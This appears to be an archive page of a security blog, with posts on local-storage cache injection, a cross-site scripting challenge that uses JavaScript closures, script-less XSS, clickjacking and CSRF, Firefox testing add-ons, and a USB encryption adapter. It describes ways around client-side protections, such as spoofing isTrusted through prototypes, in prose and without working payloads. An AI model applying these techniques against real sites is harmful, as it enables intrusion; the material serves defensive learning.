tl;dr Abstract

To improve performance, particularly for mobile users, many websites have started caching app logic on client devices via HTML5 local storage. Unfortunately, this can make common injection vulnerabilities even more dangerous, as malicious code can invisibly persist in the cache. Real-world examples of this problem have now been discovered in third-party “widgets” embedded across many websites, creating security risks for the companies using such services – even if their sites are otherwise protected against attacks. Striking a balance between security and performance can be difficult, but certain precautions may help prevent an attacker from exploiting local storage caches.

Background

Throughout the history of web development, people have found ways to use and abuse various technologies beyond their intended purposes. Before CSS gained widespread support, many developers created complex layouts with HTML tables. Now that browsers provide far more presentation-layer tools, one can recreate complex images using only CSS. Such tricks can at times be very helpful in overcoming the limits of a browser-based environment, but they can also inadvertently create security issues.

(more…)

Post to Twitter Post to Facebook

This entry was posted on Wednesday, February 1st, 2012 at 2:57 pm by Joey Tyson and is filed under cool, hacking, software.

 

Security researcher Mario Heiderich (also creator of the HTML5 Security Cheatsheet and lead developer for PHPIDS) has been posting some interesting cross-site scripting challenges lately that highlight aspects of security on the client side. The most recent, called XSSMe², involved a page with a reflected XSS vulnerability that allowed one to insert arbitrary HTML – no filters applied by the server. The goal? Retrieve a particular bit of data, originally stored in document.cookie, without any user interaction. I say “originally,” because the page included JavaScript which attempted to lock down access to the data by removing it from document.cookie and hiding it unless retrieved by a user click. The code used evolved as bypasses were found, with several tricks employed along the way.

One trick was to hide the variable in a closure. In JavaScript, every function has its own local scope. If you define a variable within a function block, that variable is distinct from one defined in the global scope. In a way, the variable is hidden from code executed in the global scope, though the function can provide a gatekeeper method to access it. Consider this block of code:

document.cookie = "secret";

var Safe = function() {
    var cookie = document.cookie;
    this.get = function(magicWord) {
        if (magicWord === "please") {
            return cookie;
        }
        return null;
    }
}
window.Safe = new Safe();

document.cookie = "";

alert(document.cookie);
alert(Safe.get(""));
alert(Safe.get("please"));

The first alert returns nothing – document.cookie has been set to an empty string. The second alert only returns null, given the if statement in the definition of Safe.get. But with the third alert, the statement return cookie gets executed – and that statement is in the local scope of the function, so it returns the cookie variable defined in that scope, which is “secret”. This is the concept of a closure – the local variable of the function lives on as it was defined in that context.

Initially, this may seem to be a good defense against cross-site scripting, since the power of XSS comes from all a page’s scripts executing in the same scope. But as entries in the challenge demonstrated, a script has many resources for attacking itself. For instance, the challenge included code that checked whether a function requesting the secret variable was a mouse click event initiated by the user. That last bit came from checking the isTrusted property on the event, which should tell you whether the click came from a script or from the user.

But in JavaScript, new objects are created by cloning a model object called a prototype. If you change a particular prototype, any new variety of that object will inherit the changes you made. In this case, changing the isTrusted property of a mouse event’s prototype to always be true meant any spoofed clicks generated automatically by a script would fool the protective code and retrieve the secret value.

With each new bypass, Mario updated the code with new protections to block them. Eventually, he created a Firefox-specific version that essentially rewrote the entire page to get rid of the original Document Object Model and all its loopholes. If you’re interested in reading more about other bypass techniques and the challenge’s implications for client-side filtering, researcher Krzysztof Kotowicz has an excellent write-up that covers more details. But the challenge is also worth studying as a way of understanding more about web scripting and XSS. I certainly learned more about closures and event spoofing by tackling the puzzle, and it helps illustrate the difficulties of trying to protect against code running in the same origin and same scope. We may be moving towards DOM features that provide enough security to block even client-side attacks, but for right now, any untrusted script has myriad ways of overcoming client-side protections.

Post to Twitter Post to Facebook

This entry was posted on Thursday, October 13th, 2011 at 11:59 pm by Joey Tyson and is filed under cool, hacking, software, Technology & Tool Thursday.

 

I often talk about cross-site scripting (XSS), and that’s partly because I think it’s a pretty interesting type of vulnerability that many developers tend to overlook. It can be quite dangerous, but can also be quite misunderstood. For one thing, the name can be misleading: exploiting XSS does not always involve scripting, and the proliferation of web technologies has taken XSS issues beyond the browser.

One example of script-less cross-site scripting affected some high-profile MySpace users in 2007. Attackers were able to inject HTML into celebrity MySpace pages, but the service filtered out typical <script> payloads. Seemingly innocent <a> links were allowed, though, and adding a bit of CSS allowed one to create an invisible link that covered the entire page. In this case, clicking anywhere on an infected profile led to a malware download.

This attack could be one of the first prominent cases of clickjacking, though the term is usually applied to attacks that hijack clicks with malicious inline frames (iframes). Allowing <iframe> elements in user-controlled HTML opens up a range of issues more broadly known as UI redressing. For instance, an iframe that covers the entire page could render a fake login form that appears to be legitimate given the site’s address, leading to a powerful phishing attack. Frames and forms can also be used to bypass CSRF protections.

Of course, you can sometimes launch simple CSRF attacks using only images. By setting the “src” attribute of an <img> element to another page, the browser will still execute a GET request to that page when it tries to load the image. Without proper CSRF protections, such an attack may be possible without XSS to begin with. But images can also be a source of information leakage or tracking, since GET requests to a malicious server will also likely include a “Referer” header.

While most XSS payloads do capitalize on the power of JavaScript, keep in mind that a browser can load scripts from many places besides within script tags. Event attributes for other elements and certain CSS properties are just two examples of places a script could slip in. And don’t forget about the risks of browser plug-ins – Flash 0-day issues or malicious PDF files can also be sources of trouble.

Finally, an issue this week served to remind that XSS is no longer just a concern within the context of a web browser. As HTML and JavaScript become a greater part of developing apps built outside the browser, XSS may pop up on other platforms. On Monday, a security researcher with the handle superevr disclosed an XSS vulnerability in Skype for iOS. By inserting HTML into the “Full Name” of a user, one could send messages that when viewed would launch code capable of stealing the phone’s address book. And this wasn’t the first time XSS has been a problem for Skype – a vulnerability in desktop versions was found a few months ago, and XSS with shared content could lead to problems back in 2008.

Alternate labels, such as “HTML injection” or “web content injection,” have been proposed to describe cross-site scripting, but the established term is likely here to say. Still, remember that protecting against XSS does not simply mean blocking script tags, and keep in mind the power of XSS when integrating web technologies with other platforms.

Post to Twitter Post to Facebook

This entry was posted on Wednesday, September 21st, 2011 at 5:34 pm by Joey Tyson and is filed under hacking, software, Tutorial Tuesday.

 

If you’re new to the world of testing web application security, you may not be aware of the many great Firefox add-ons available that greatly help such endeavors. While others have compiled similar lists in the past, I thought this week would be a good time for me to share a few of the favorite tools I use in my own web app work.

  1. HttpFox: I’ve blogged about this one in the past; it lists for you every HTTP request made during a given browser session, with details on headers, cookies, parameters, responses, and more. Very handy to monitor traffic when you’re browsing around an app.
  2. HackBar: Another one I’ve mentioned before, the HackBar is a swiss-army knife that gives you some space for notes, common commands (such as base64 encoding or MD5 hashes), and perhaps best of all, an easy way to execute manual POST requests.
  3. FireBug: Perhaps one of the best-known Firefox plug-ins, FireBug is a powerful tool for inspecting a page’s DOM, debugging scripts, and investigating script variables.
  4. Cookies Manager+: As you can guess, this add-on lets you view and edit browser cookies to your heart’s content. Useful in tracking and spoofing session information.
  5. Modify Headers: Many web apps use special headers in various ways; this tool lets you set such headers manually when making requests. Spoofing XMLHttpRequest commands is one use case.
  6. User Agent Switcher: I’ve seen apps with vulnerabilities that only affected mobile versions of the site. This extension lets you imitate just about any browser, allowing you to test different site interfaces.
  7. JavaScript Deobfuscator: This is one add-on I only recently discovered, but I can already tell it will be quite useful. It logs JavaScript functions as they’re compiled or executed by the browser, which is particularly useful in dealing with obfuscated scripts.

This list is by no means exhaustive and is geared towards manual testing, but it certainly provides a solid line-up for anyone looking to experiment with web app security. It also shows how easy it can be to get started tinkering with web apps. While I use Chrome for my everyday browsing, I use my tricked-out Firefox setup when I want to dig deeper. If you’re starting out, try using these add-ons against an educational app, such as WebGoat, Gruyere, or DVWA.

Post to Twitter Post to Facebook

This entry was posted on Thursday, July 21st, 2011 at 5:38 pm by Joey Tyson and is filed under hacking, software, Technology & Tool Thursday.

 

Ever wonder about how we came to have the technologies and programming languages used today? Yahoo’s senior JavaScript architect Douglas Crockford gave a presentation in early 2010 that traces the developments which brought us the beloved and hated language that powers client-side web behaviors. The video is nearly two hours and only the first in a series on JavaScript, but Crockford relates many interesting stories about the history of computing and notes patterns in how technology tends to develop. Check it out if you want to learn more about the background of that quirky yet powerful bit of tech we call JavaScript:

Crockford on JavaScript: The Early Years

Post to Twitter Post to Facebook

This entry was posted on Tuesday, June 28th, 2011 at 2:56 pm by Joey Tyson and is filed under cool, general, software, Tutorial Tuesday.

 

Recently I had the chance to test out a clever little device called the hiddn Crypto Adapter. Made by Norway-based High Density Devices, the adapter looks somewhat like a miniature desk calculator with a USB port instead of a display, but its simple appearance belies some powerful functionality: transparent, real-time encryption of USB drives with two-factor authentication.

The adapter essentially acts as a proxy between your computer and a USB drive, meaning it needs no software, has no operating system requirement, and works with everything from a flash memory stick to an external hard drive. All communication with the USB device is encrypted on the fly using 256-bit AES via a certified FIPS 140-2 Level 3 crypto module, but the key isn’t stored on the drive: at the front of the hiddn adapter is a smart card slot.

When you insert a smart card, you have to enter the corresponding PIN code to use it. (After three unsuccessful attempts, the card becomes locked until a longer PUK code is given.) The device does not appear as an active USB device in the OS until a card is verified, and becomes “unplugged” when the card is removed. The encryption key (or half of it in split-key mode) stays on the smart card, making an encrypted drive unusable without it.

Setting up and operating the hiddn system is very straightforward. You connect it to your computer with a USB cable, plug a drive into the top USB port, insert your smart card, and then enter your PIN. From there, the experience is no different than using a USB drive normally – there’s not even a difference in speed.

When I first connected an unencrypted drive on a Windows machine, it appeared as an unformatted drive. After formatting, it behaved just as it would when plugged in directly. (A few times I had to reconnect the adapter to get Windows to recognize a new drive if I didn’t “eject” the drive first or tried a bad PIN, but those were minor issues.) Trying to use the drive without the hiddn adapter after it had been encrypted brought up another prompt to format – Windows could tell there was a volume, but it was completely unreadable.

After using the hiddn Crypto Adapter for a short time, I started wondering why no one else had thought of it before – or at least why I’d never heard of it before. It’s a great tool for anyone wanting a no-hassle method to encrypt removable storage. The only potential drawback is pricing; two adapters and two sets of pre-configured smart cards can run almost $900. High Density Devices offers a few different packages of units and cards, ranging from one of each to ten, as well as an enterprise key management system for creating new cards. But while some users may find hiddn too expensive for personal use, its flexibility, ease-of-use, and high security make for a combination that’s hard to beat.

Post to Twitter Post to Facebook

This entry was posted on Thursday, June 2nd, 2011 at 12:30 pm by Joey Tyson and is filed under cool, data protection, hardware, Technology & Tool Thursday.